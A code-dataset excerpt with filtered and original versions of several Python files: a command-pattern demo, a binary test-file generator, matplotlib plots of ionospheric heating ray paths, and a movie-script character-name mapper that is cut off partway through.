hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4729617395af2416efcaa130869d5946a99d3d54 | 224 | py | Python | note24/order_system (3)/test2.py | icexmoon/python-learning-notes | 838c91d896404290b89992b6517be1b6a79df41f | [
"MIT"
] | null | null | null | note24/order_system (3)/test2.py | icexmoon/python-learning-notes | 838c91d896404290b89992b6517be1b6a79df41f | [
"MIT"
] | null | null | null | note24/order_system (3)/test2.py | icexmoon/python-learning-notes | 838c91d896404290b89992b6517be1b6a79df41f | [
"MIT"
] | null | null | null |
macroCommand = MacroCommand()
macroCommand() | 22.4 | 38 | 0.651786 | class MacroCommand():
def __init__(self, commands:list):
self.commands = commands
def __call__(self):
for command in self.commands:
command()
macroCommand = MacroCommand()
macroCommand() | 104 | 0 | 75 |
3a8ceb9c5e6bc6cf5b6a418a391cb2131fc167b1 | 339 | py | Python | graph_generator.py | zhaofeng-shu33/triangle_counting | 4a2f92ed005868f39934d983c6a633c888f8ccd8 | [
"Apache-2.0"
] | null | null | null | graph_generator.py | zhaofeng-shu33/triangle_counting | 4a2f92ed005868f39934d983c6a633c888f8ccd8 | [
"Apache-2.0"
] | 1 | 2019-10-01T08:59:46.000Z | 2019-10-04T14:06:49.000Z | graph_generator.py | zhaofeng-shu33/triangle_counting | 4a2f92ed005868f39934d983c6a633c888f8ccd8 | [
"Apache-2.0"
] | 1 | 2019-11-10T08:59:51.000Z | 2019-11-10T08:59:51.000Z | import struct
import os
BUILD_DIR = os.environ.get('BUILD_DIR', 'build')
if __name__ == '__main__':
f = open(os.path.join(BUILD_DIR, 'test_io.bin'), 'wb')
f.write(struct.pack('6I',0,1,2,0,1,2))
f.close()
f = open(os.path.join(BUILD_DIR, 'test_io_false.bin'), 'wb')
f.write(struct.pack('5I',0,1,1,2,0))
f.close()
| 24.214286 | 64 | 0.619469 | import struct
import os
BUILD_DIR = os.environ.get('BUILD_DIR', 'build')
if __name__ == '__main__':
f = open(os.path.join(BUILD_DIR, 'test_io.bin'), 'wb')
f.write(struct.pack('6I',0,1,2,0,1,2))
f.close()
f = open(os.path.join(BUILD_DIR, 'test_io_false.bin'), 'wb')
f.write(struct.pack('5I',0,1,1,2,0))
f.close()
| 0 | 0 | 0 |
4aea924e177a43d62285a6e6b23098f4fa4e3f5d | 9,999 | py | Python | figure1_additional.py | ashindin/Inclined_sweeps_HAARP | 547eca3d64a4043ba92c59333d009371863d79e4 | [
"MIT"
] | 1 | 2020-07-11T03:48:55.000Z | 2020-07-11T03:48:55.000Z | figure1_additional.py | ashindin/Inclined_sweeps_HAARP | 547eca3d64a4043ba92c59333d009371863d79e4 | [
"MIT"
] | null | null | null | figure1_additional.py | ashindin/Inclined_sweeps_HAARP | 547eca3d64a4043ba92c59333d009371863d79e4 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size': 18})
pol_thres=0.7
xlsx_filename='/home/ashindin/owncloud/0002_see_incl/Data_1_5.83.xlsx'
table=pd.read_excel(xlsx_filename, index_col=None, header=None)
Ex, Ey, Ez, h, X, T, n2, labs =[],[],[],[],[],[],[],[]
for i in range(9):
Ex.append(table[0+i*9][1::].values.astype(float))
Ey.append(table[1+i*9][1::].values.astype(float))
Ez.append(table[2+i*9][1::].values.astype(float))
h.append(table[3+i*9][1::].values.astype(float))
X.append(table[4+i*9][1::].values.astype(float))
T.append(table[5+i*9][1::].values.astype(float))
n2.append(table[6+i*9][1::].values.astype(float))
labs.append(table[7+i*9][1])
fig=plt.figure(figsize=(9,6))
ax=plt.axes()
colors=['r','g','b','c','m', 'y', 'orange', 'brown', 'lime']
labels=[r'$\alpha=-28^\circ$',r'$\alpha=-21^\circ$',r'$\alpha=-14^\circ$',r'$\alpha=-7^\circ$',r'$\alpha=0^\circ$',
r'$\alpha=7^\circ$', r'$\alpha=14^\circ$', r'$\alpha=21^\circ$', r'$\alpha=28^\circ$']
ind=0
for i in [0,2,3,4,5,7,6,8,1]:
plt.plot(X[i],h[i],color=colors[ind],label='')
plt.plot(X[i][np.where(Ez[i]>pol_thres)[0]],h[i][np.where(Ez[i]>pol_thres)[0]],color=colors[ind],label=labels[ind],lw=4)
ind+=1
plt.legend(loc=3)
plt.title("5830 kHz")
plt.xlabel('X, km')
plt.ylabel('h, km')
ax.set_xticks([-300,-200,-100,0,100,200,300])
ax.set_ylim(80,230)
ann1 = ax.annotate('', xy=(11, 80), xycoords='data',
xytext=(11, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann2 = ax.annotate('', xy=(82, 80), xycoords='data',
xytext=(82, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann3 = ax.annotate('', xy=(113, 80), xycoords='data',
xytext=(113, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann4 = ax.annotate('A', Color='k', xy=(7, 90), xycoords='data',
xytext=(7-3, 92), textcoords='data')
ann5 = ax.annotate('B', Color='k', xy=(78, 90), xycoords='data',
xytext=(78-3, 92), textcoords='data')
ann4 = ax.annotate('C', Color='k', xy=(109, 90), xycoords='data',
xytext=(109-3, 92), textcoords='data')
r=40
x0=50; y0=220
dx=-r*np.cos(75.822*np.pi/180); dy=-r*np.sin(75.822*np.pi/180)
# ~ print(dx,dy)
ann_mag = ax.annotate('', xy=(x0+dx, y0+dy), xycoords='data',
xytext=(x0, y0), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_B = ax.annotate('B', Color='k', xy=(30, 200), xycoords='data',
xytext=(27,200), textcoords='data',fontsize=16,fontweight='bold')
ax.plot([-300,300],[223,223], "k--",lw=2)
ann_ns = ax.annotate('', xy=(150, 120), xycoords='data',
xytext=(300, 120), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_N = ax.annotate('N', Color='k', xy=(125, 120), xycoords='data',
xytext=(132,118), textcoords='data',fontsize=16)
ann_S = ax.annotate('S', Color='k', xy=(304, 120), xycoords='data',
xytext=(305,118), textcoords='data',fontsize=16)
plt.savefig('figure1a_5830.pdf',dpi=600)
plt.savefig('figure1a_5830.png')
plt.close()
xlsx_filename='/home/ashindin/owncloud/0002_see_incl/sData_1_5.73.xlsx'
table=pd.read_excel(xlsx_filename, index_col=None, header=None)
Ex, Ey, Ez, h, X, T, n2, labs =[],[],[],[],[],[],[],[]
for i in range(9):
Ex.append(table[0+i*9][1::].values.astype(float))
Ey.append(table[1+i*9][1::].values.astype(float))
Ez.append(table[2+i*9][1::].values.astype(float))
h.append(table[3+i*9][1::].values.astype(float))
X.append(table[4+i*9][1::].values.astype(float))
T.append(table[5+i*9][1::].values.astype(float))
n2.append(table[6+i*9][1::].values.astype(float))
labs.append(table[7+i*9][1])
fig=plt.figure(figsize=(9,6))
ax=plt.axes()
colors=['r','g','b','c','m', 'y', 'orange', 'brown', 'lime']
labels=[r'$\alpha=-28^\circ$',r'$\alpha=-21^\circ$',r'$\alpha=-14^\circ$',r'$\alpha=-7^\circ$',r'$\alpha=0^\circ$',
r'$\alpha=7^\circ$', r'$\alpha=14^\circ$', r'$\alpha=21^\circ$', r'$\alpha=28^\circ$']
ind=0
for i in [0,1, 2,3,4,5,6,7,8]:
plt.plot(X[i],h[i],color=colors[ind],label='')
plt.plot(X[i][np.where(Ez[i]>pol_thres)[0]],h[i][np.where(Ez[i]>pol_thres)[0]],color=colors[ind],label=labels[ind],lw=4)
ind+=1
plt.legend(loc=3)
plt.title("5730 kHz")
plt.xlabel('X, km')
plt.ylabel('h, km')
ax.set_xticks([-300,-200,-100,0,100,200,300])
ax.set_ylim(80,230)
ann1 = ax.annotate('', xy=(11, 80), xycoords='data',
xytext=(11, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann2 = ax.annotate('', xy=(82, 80), xycoords='data',
xytext=(82, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann3 = ax.annotate('', xy=(113, 80), xycoords='data',
xytext=(113, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann4 = ax.annotate('A', Color='k', xy=(7, 90), xycoords='data',
xytext=(7-3, 92), textcoords='data')
ann5 = ax.annotate('B', Color='k', xy=(78, 90), xycoords='data',
xytext=(78-3, 92), textcoords='data')
ann4 = ax.annotate('C', Color='k', xy=(109, 90), xycoords='data',
xytext=(109-3, 92), textcoords='data')
r=40
x0=50; y0=220
dx=-r*np.cos(75.822*np.pi/180); dy=-r*np.sin(75.822*np.pi/180)
# ~ print(dx,dy)
ann_mag = ax.annotate('', xy=(x0+dx, y0+dy), xycoords='data',
xytext=(x0, y0), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_B = ax.annotate('B', Color='k', xy=(30, 200), xycoords='data',
xytext=(27,200), textcoords='data',fontsize=16,fontweight='bold')
ax.plot([-300,300],[223,223], "k--",lw=2)
ann_ns = ax.annotate('', xy=(150, 120), xycoords='data',
xytext=(300, 120), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_N = ax.annotate('N', Color='k', xy=(125, 120), xycoords='data',
xytext=(132,118), textcoords='data',fontsize=16)
ann_S = ax.annotate('S', Color='k', xy=(304, 120), xycoords='data',
xytext=(305,118), textcoords='data',fontsize=16)
plt.savefig('figure1a_5730.pdf',dpi=600)
plt.savefig('figure1a_5730.png')
plt.close()
xlsx_filename='/home/ashindin/owncloud/0002_see_incl/sData_1_5.93.xlsx'
table=pd.read_excel(xlsx_filename, index_col=None, header=None)
Ex, Ey, Ez, h, X, T, n2, labs =[],[],[],[],[],[],[],[]
for i in range(9):
Ex.append(table[0+i*9][1::].values.astype(float))
Ey.append(table[1+i*9][1::].values.astype(float))
Ez.append(table[2+i*9][1::].values.astype(float))
h.append(table[3+i*9][1::].values.astype(float))
X.append(table[4+i*9][1::].values.astype(float))
T.append(table[5+i*9][1::].values.astype(float))
n2.append(table[6+i*9][1::].values.astype(float))
labs.append(table[7+i*9][1])
fig=plt.figure(figsize=(9,6))
ax=plt.axes()
colors=['r','g','b','c','m', 'y', 'orange', 'brown', 'lime']
labels=[r'$\alpha=-28^\circ$',r'$\alpha=-21^\circ$',r'$\alpha=-14^\circ$',r'$\alpha=-7^\circ$',r'$\alpha=0^\circ$',
r'$\alpha=7^\circ$', r'$\alpha=14^\circ$', r'$\alpha=21^\circ$', r'$\alpha=28^\circ$']
ind=0
for i in [0,1, 2,3,4,5,6,7,8]:
plt.plot(X[i],h[i],color=colors[ind],label='')
plt.plot(X[i][np.where(Ez[i]>pol_thres)[0]],h[i][np.where(Ez[i]>pol_thres)[0]],color=colors[ind],label=labels[ind],lw=4)
ind+=1
plt.legend(loc=3)
plt.title("5930 kHz")
plt.xlabel('X, km')
plt.ylabel('h, km')
ax.set_xticks([-300,-200,-100,0,100,200,300])
ax.set_ylim(80,230)
ann1 = ax.annotate('', xy=(11, 80), xycoords='data',
xytext=(11, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann2 = ax.annotate('', xy=(82, 80), xycoords='data',
xytext=(82, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann3 = ax.annotate('', xy=(113, 80), xycoords='data',
xytext=(113, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann4 = ax.annotate('A', Color='k', xy=(7, 90), xycoords='data',
xytext=(7-3, 92), textcoords='data')
ann5 = ax.annotate('B', Color='k', xy=(78, 90), xycoords='data',
xytext=(78-3, 92), textcoords='data')
ann4 = ax.annotate('C', Color='k', xy=(109, 90), xycoords='data',
xytext=(109-3, 92), textcoords='data')
r=40
x0=50; y0=220
dx=-r*np.cos(75.822*np.pi/180); dy=-r*np.sin(75.822*np.pi/180)
# ~ print(dx,dy)
ann_mag = ax.annotate('', xy=(x0+dx, y0+dy), xycoords='data',
xytext=(x0, y0), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_B = ax.annotate('B', Color='k', xy=(30, 200), xycoords='data',
xytext=(27,200), textcoords='data',fontsize=16,fontweight='bold')
ax.plot([-300,300],[223,223], "k--",lw=2)
ann_ns = ax.annotate('', xy=(150, 120), xycoords='data',
xytext=(300, 120), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_N = ax.annotate('N', Color='k', xy=(125, 120), xycoords='data',
xytext=(132,118), textcoords='data',fontsize=16)
ann_S = ax.annotate('S', Color='k', xy=(304, 120), xycoords='data',
xytext=(305,118), textcoords='data',fontsize=16)
plt.savefig('figure1a_5930.pdf',dpi=600)
plt.savefig('figure1a_5930.png')
plt.close() | 40.481781 | 124 | 0.557956 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size': 18})
pol_thres=0.7
xlsx_filename='/home/ashindin/owncloud/0002_see_incl/Data_1_5.83.xlsx'
table=pd.read_excel(xlsx_filename, index_col=None, header=None)
Ex, Ey, Ez, h, X, T, n2, labs =[],[],[],[],[],[],[],[]
for i in range(9):
Ex.append(table[0+i*9][1::].values.astype(float))
Ey.append(table[1+i*9][1::].values.astype(float))
Ez.append(table[2+i*9][1::].values.astype(float))
h.append(table[3+i*9][1::].values.astype(float))
X.append(table[4+i*9][1::].values.astype(float))
T.append(table[5+i*9][1::].values.astype(float))
n2.append(table[6+i*9][1::].values.astype(float))
labs.append(table[7+i*9][1])
fig=plt.figure(figsize=(9,6))
ax=plt.axes()
colors=['r','g','b','c','m', 'y', 'orange', 'brown', 'lime']
labels=[r'$\alpha=-28^\circ$',r'$\alpha=-21^\circ$',r'$\alpha=-14^\circ$',r'$\alpha=-7^\circ$',r'$\alpha=0^\circ$',
r'$\alpha=7^\circ$', r'$\alpha=14^\circ$', r'$\alpha=21^\circ$', r'$\alpha=28^\circ$']
ind=0
for i in [0,2,3,4,5,7,6,8,1]:
plt.plot(X[i],h[i],color=colors[ind],label='')
plt.plot(X[i][np.where(Ez[i]>pol_thres)[0]],h[i][np.where(Ez[i]>pol_thres)[0]],color=colors[ind],label=labels[ind],lw=4)
ind+=1
plt.legend(loc=3)
plt.title("5830 kHz")
plt.xlabel('X, km')
plt.ylabel('h, km')
ax.set_xticks([-300,-200,-100,0,100,200,300])
ax.set_ylim(80,230)
ann1 = ax.annotate('', xy=(11, 80), xycoords='data',
xytext=(11, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann2 = ax.annotate('', xy=(82, 80), xycoords='data',
xytext=(82, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann3 = ax.annotate('', xy=(113, 80), xycoords='data',
xytext=(113, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann4 = ax.annotate('A', Color='k', xy=(7, 90), xycoords='data',
xytext=(7-3, 92), textcoords='data')
ann5 = ax.annotate('B', Color='k', xy=(78, 90), xycoords='data',
xytext=(78-3, 92), textcoords='data')
ann4 = ax.annotate('C', Color='k', xy=(109, 90), xycoords='data',
xytext=(109-3, 92), textcoords='data')
r=40
x0=50; y0=220
dx=-r*np.cos(75.822*np.pi/180); dy=-r*np.sin(75.822*np.pi/180)
# ~ print(dx,dy)
ann_mag = ax.annotate('', xy=(x0+dx, y0+dy), xycoords='data',
xytext=(x0, y0), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_B = ax.annotate('B', Color='k', xy=(30, 200), xycoords='data',
xytext=(27,200), textcoords='data',fontsize=16,fontweight='bold')
ax.plot([-300,300],[223,223], "k--",lw=2)
ann_ns = ax.annotate('', xy=(150, 120), xycoords='data',
xytext=(300, 120), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_N = ax.annotate('N', Color='k', xy=(125, 120), xycoords='data',
xytext=(132,118), textcoords='data',fontsize=16)
ann_S = ax.annotate('S', Color='k', xy=(304, 120), xycoords='data',
xytext=(305,118), textcoords='data',fontsize=16)
plt.savefig('figure1a_5830.pdf',dpi=600)
plt.savefig('figure1a_5830.png')
plt.close()
xlsx_filename='/home/ashindin/owncloud/0002_see_incl/sData_1_5.73.xlsx'
table=pd.read_excel(xlsx_filename, index_col=None, header=None)
Ex, Ey, Ez, h, X, T, n2, labs =[],[],[],[],[],[],[],[]
for i in range(9):
Ex.append(table[0+i*9][1::].values.astype(float))
Ey.append(table[1+i*9][1::].values.astype(float))
Ez.append(table[2+i*9][1::].values.astype(float))
h.append(table[3+i*9][1::].values.astype(float))
X.append(table[4+i*9][1::].values.astype(float))
T.append(table[5+i*9][1::].values.astype(float))
n2.append(table[6+i*9][1::].values.astype(float))
labs.append(table[7+i*9][1])
fig=plt.figure(figsize=(9,6))
ax=plt.axes()
colors=['r','g','b','c','m', 'y', 'orange', 'brown', 'lime']
labels=[r'$\alpha=-28^\circ$',r'$\alpha=-21^\circ$',r'$\alpha=-14^\circ$',r'$\alpha=-7^\circ$',r'$\alpha=0^\circ$',
r'$\alpha=7^\circ$', r'$\alpha=14^\circ$', r'$\alpha=21^\circ$', r'$\alpha=28^\circ$']
ind=0
for i in [0,1, 2,3,4,5,6,7,8]:
plt.plot(X[i],h[i],color=colors[ind],label='')
plt.plot(X[i][np.where(Ez[i]>pol_thres)[0]],h[i][np.where(Ez[i]>pol_thres)[0]],color=colors[ind],label=labels[ind],lw=4)
ind+=1
plt.legend(loc=3)
plt.title("5730 kHz")
plt.xlabel('X, km')
plt.ylabel('h, km')
ax.set_xticks([-300,-200,-100,0,100,200,300])
ax.set_ylim(80,230)
ann1 = ax.annotate('', xy=(11, 80), xycoords='data',
xytext=(11, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann2 = ax.annotate('', xy=(82, 80), xycoords='data',
xytext=(82, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann3 = ax.annotate('', xy=(113, 80), xycoords='data',
xytext=(113, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann4 = ax.annotate('A', Color='k', xy=(7, 90), xycoords='data',
xytext=(7-3, 92), textcoords='data')
ann5 = ax.annotate('B', Color='k', xy=(78, 90), xycoords='data',
xytext=(78-3, 92), textcoords='data')
ann4 = ax.annotate('C', Color='k', xy=(109, 90), xycoords='data',
xytext=(109-3, 92), textcoords='data')
r=40
x0=50; y0=220
dx=-r*np.cos(75.822*np.pi/180); dy=-r*np.sin(75.822*np.pi/180)
# ~ print(dx,dy)
ann_mag = ax.annotate('', xy=(x0+dx, y0+dy), xycoords='data',
xytext=(x0, y0), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_B = ax.annotate('B', Color='k', xy=(30, 200), xycoords='data',
xytext=(27,200), textcoords='data',fontsize=16,fontweight='bold')
ax.plot([-300,300],[223,223], "k--",lw=2)
ann_ns = ax.annotate('', xy=(150, 120), xycoords='data',
xytext=(300, 120), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_N = ax.annotate('N', Color='k', xy=(125, 120), xycoords='data',
xytext=(132,118), textcoords='data',fontsize=16)
ann_S = ax.annotate('S', Color='k', xy=(304, 120), xycoords='data',
xytext=(305,118), textcoords='data',fontsize=16)
plt.savefig('figure1a_5730.pdf',dpi=600)
plt.savefig('figure1a_5730.png')
plt.close()
xlsx_filename='/home/ashindin/owncloud/0002_see_incl/sData_1_5.93.xlsx'
table=pd.read_excel(xlsx_filename, index_col=None, header=None)
Ex, Ey, Ez, h, X, T, n2, labs =[],[],[],[],[],[],[],[]
for i in range(9):
Ex.append(table[0+i*9][1::].values.astype(float))
Ey.append(table[1+i*9][1::].values.astype(float))
Ez.append(table[2+i*9][1::].values.astype(float))
h.append(table[3+i*9][1::].values.astype(float))
X.append(table[4+i*9][1::].values.astype(float))
T.append(table[5+i*9][1::].values.astype(float))
n2.append(table[6+i*9][1::].values.astype(float))
labs.append(table[7+i*9][1])
fig=plt.figure(figsize=(9,6))
ax=plt.axes()
colors=['r','g','b','c','m', 'y', 'orange', 'brown', 'lime']
labels=[r'$\alpha=-28^\circ$',r'$\alpha=-21^\circ$',r'$\alpha=-14^\circ$',r'$\alpha=-7^\circ$',r'$\alpha=0^\circ$',
r'$\alpha=7^\circ$', r'$\alpha=14^\circ$', r'$\alpha=21^\circ$', r'$\alpha=28^\circ$']
ind=0
for i in [0,1, 2,3,4,5,6,7,8]:
plt.plot(X[i],h[i],color=colors[ind],label='')
plt.plot(X[i][np.where(Ez[i]>pol_thres)[0]],h[i][np.where(Ez[i]>pol_thres)[0]],color=colors[ind],label=labels[ind],lw=4)
ind+=1
plt.legend(loc=3)
plt.title("5930 kHz")
plt.xlabel('X, km')
plt.ylabel('h, km')
ax.set_xticks([-300,-200,-100,0,100,200,300])
ax.set_ylim(80,230)
ann1 = ax.annotate('', xy=(11, 80), xycoords='data',
xytext=(11, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann2 = ax.annotate('', xy=(82, 80), xycoords='data',
xytext=(82, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann3 = ax.annotate('', xy=(113, 80), xycoords='data',
xytext=(113, 90), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann4 = ax.annotate('A', Color='k', xy=(7, 90), xycoords='data',
xytext=(7-3, 92), textcoords='data')
ann5 = ax.annotate('B', Color='k', xy=(78, 90), xycoords='data',
xytext=(78-3, 92), textcoords='data')
ann4 = ax.annotate('C', Color='k', xy=(109, 90), xycoords='data',
xytext=(109-3, 92), textcoords='data')
r=40
x0=50; y0=220
dx=-r*np.cos(75.822*np.pi/180); dy=-r*np.sin(75.822*np.pi/180)
# ~ print(dx,dy)
ann_mag = ax.annotate('', xy=(x0+dx, y0+dy), xycoords='data',
xytext=(x0, y0), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_B = ax.annotate('B', Color='k', xy=(30, 200), xycoords='data',
xytext=(27,200), textcoords='data',fontsize=16,fontweight='bold')
ax.plot([-300,300],[223,223], "k--",lw=2)
ann_ns = ax.annotate('', xy=(150, 120), xycoords='data',
xytext=(300, 120), textcoords='data',
arrowprops=dict(arrowstyle="->",
ec="k",lw=2))
ann_N = ax.annotate('N', Color='k', xy=(125, 120), xycoords='data',
xytext=(132,118), textcoords='data',fontsize=16)
ann_S = ax.annotate('S', Color='k', xy=(304, 120), xycoords='data',
xytext=(305,118), textcoords='data',fontsize=16)
plt.savefig('figure1a_5930.pdf',dpi=600)
plt.savefig('figure1a_5930.png')
plt.close() | 0 | 0 | 0 |
fea688429f87982fb8a93218e858284b0251c00a | 33,835 | py | Python | src/python/process_scripts/map_characters.py | abd5ge/movievis | 1945b12128f8324dde5778bf7fffb7fc6d9b6cf3 | [
"MIT"
] | 2 | 2020-04-12T21:50:57.000Z | 2020-04-13T03:26:17.000Z | src/python/process_scripts/map_characters.py | abd5ge/movievis | 1945b12128f8324dde5778bf7fffb7fc6d9b6cf3 | [
"MIT"
] | 7 | 2020-11-13T18:45:29.000Z | 2022-03-12T00:23:54.000Z | src/python/process_scripts/map_characters.py | abd5ge/movievis | 1945b12128f8324dde5778bf7fffb7fc6d9b6cf3 | [
"MIT"
] | 2 | 2020-04-12T21:54:50.000Z | 2020-04-16T04:53:54.000Z | from __future__ import unicode_literals
import argparse
import csv
import json
import re
import os
import unicodedata
import itertools
import concurrent.futures
# import editdistance
import pandas as pd
try:
import pylcs
except:
print("Could not import pylcs; falling back to py_common_subseq")
import py_common_subseq
from lib import utils
DEBUG = False
# class LevSimilarity(Similarity):
# def __init__(self, threshold=0.0):
# self.threshold = threshold
# def get_similarity(self, name1, name2):
# total = float(len(name1) + len(name2))
# max_val = max(len(name1), len(name2))
# return float((max_val - editdistance.eval(name1, name2))*2) / total
# def is_within_threshold(self,result, threshold=None):
# if threshold is None:
# threshold = self.threshold
# return result >= threshold
# def get_start_compare(self):
# return -1.0
# def is_exact_match(self, name1, name2):
# return self.get_similarity(name1, name2) > 0.995
# def is_closer(self, previous_result, current_result):
# return previous_result < current_result
if __name__ == '__main__':
args = parse_args()
main(args)
# main(r'E:\git\movie-analytics-112\processed_scripts\17-again.json', r'E:\git\movie-analytics-112\full_celeb_film_info.csv',os.path.join(os.getcwd(), 'mapped_scripts'))
| 42.506281 | 173 | 0.597429 | from __future__ import unicode_literals
import argparse
import csv
import json
import re
import os
import unicodedata
import itertools
import concurrent.futures
# import editdistance
import pandas as pd
try:
import pylcs
def lcs(s1, s2):
return pylcs.lcs(s1, s2)
except:
print("Could not import pylcs; falling back to py_common_subseq")
import py_common_subseq
def lcs(s1, s2):
subseq = py_common_subseq.find_common_subsequences(s1,s2)
return max([len(x) for x in subseq])
from lib import utils
DEBUG = False
def main(args):
input_file = args.input
cast_data_file = args.cast_data
nicknamefile = args.nickname_map
output_dir = args.output
cast_data = get_cast_data(cast_data_file)
nicknames = NicknameMap(nicknamefile)
auto_output_dir = os.path.join(output_dir, 'good')
manual_output_dir = os.path.join(output_dir, 'bad')
utils.ensure_exists(auto_output_dir)
utils.ensure_exists(manual_output_dir)
# already_processed_file = os.path.join(os.getcwd(), 'already_mapped.json')
# already_processed = set()
# if os.path.exists(already_processed_file):
# with open(already_processed_file, 'r', encoding='utf-8') as f:
# already_processed = set(json.load(f))
if os.path.isfile(input_file):
map_data(input_file, cast_data, nicknames, auto_output_dir, manual_output_dir)
return
# with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
# futures = {}
# try:
for filename in [x for x in os.listdir(input_file) if x.endswith('.json')]:
# if filename in already_processed:
# continue
map_data(os.path.join(input_file, filename), cast_data, nicknames, auto_output_dir, manual_output_dir)
# future = executor.submit(map_data,os.path.join(input_file, filename), cast_data, nicknames, auto_output_dir, manual_output_dir)
# futures[filename]= future
# for filenam,future in futures.items():
# future.result()
# already_processed.add(filename)
# finally:
# with open(already_processed_file, 'w', encoding='utf-8') as f:
# json.dump(list(already_processed), f)
# if os.path.exists(already_processed_file):
# os.remove(already_processed_file)
def get_cast_data(cast_data_file):
with open(cast_data_file, 'r', encoding='utf-8') as f:
return [row for row in csv.DictReader(f)]
def map_data(dialog_file, cast_data, nicknames, auto_output_dir, manual_output_dir):
dialog = None
with open(dialog_file, 'r', encoding='utf-8') as f:
dialog = json.load(f)
if len(dialog['dialog']) < 10:
print("Script parser failed for movie %s; skipping" % dialog['title'])
return
actor_data = [x for x in cast_data if int(dialog['tmdb_id']) == int(x['film_id'])]
actor_data.sort(key=lambda x: int(x['character_order']))
mapper = CharacterMapper(dialog, actor_data, nicknames)
try:
mapper.map()
mapper.to_json(auto_output_dir)
except BadMapException as exc:
print(exc)
mapper.to_json(manual_output_dir)
if DEBUG:
print("***************************************************************")
class BadMapException(Exception):
pass
class CharacterMapper():
def __init__(self, dialog, filmdata, nicknames):
"""
dialog - result of json.load on result of script_parser.py
filmdata - result of querying the db table for actor data
assumes characters are ordered by character order ascending
"""
self.filmdata = filmdata
self.dialog = dialog
self.nicknames = nicknames
self.character_info = {}
# Why reversed? Well for better or worse actor to character is many to many.
# Thus, when names are duplicated we will overwrite the character with information
# from the character with a lower character_order number
for row in reversed(filmdata):
characters = [re.sub(r'\(.+\)', '',x).strip() for x in row['character'].split('/')]
tmp = []
nickname_matcher = re.compile(r'.*\"(?P<nick>[A-Za-z. ]+)\".*')
for char in characters:
match = nickname_matcher.match(char)
if match is not None:
nickname = match.group('nick')
if DEBUG:
print("Found nickname %s for character %s" % (nickname, char))
tmp.append({
'name': char,
'nickname': nickname
})
else:
tmp.append({
'name': char
})
characters = tmp
for char in characters:
matchme = None
name = char['name']
if 'nickname' in char:
matchme = char['nickname']
else:
matchme = char['name']
self.character_info[matchme] = {
'character_order': int(row['character_order']),
'celeb_id': row['celeb_id'],
'name': name
}
tmp = [tup for tup in self.character_info.items()]
tmp.sort(key=lambda x: x[1]['character_order'])
self.actual_characters = [x[0] for x in tmp]
self.parsed_characters = dialog['characters']
self.parsed_cleaned_names = {x: clean_name(x) for x in self.parsed_characters}
self.actual_cleaned_names = {x: clean_name(x) for x in self.actual_characters}
